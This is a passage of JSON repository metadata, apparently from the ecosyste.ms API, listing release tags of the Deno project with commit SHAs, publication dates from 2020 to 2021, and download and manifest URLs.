tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id"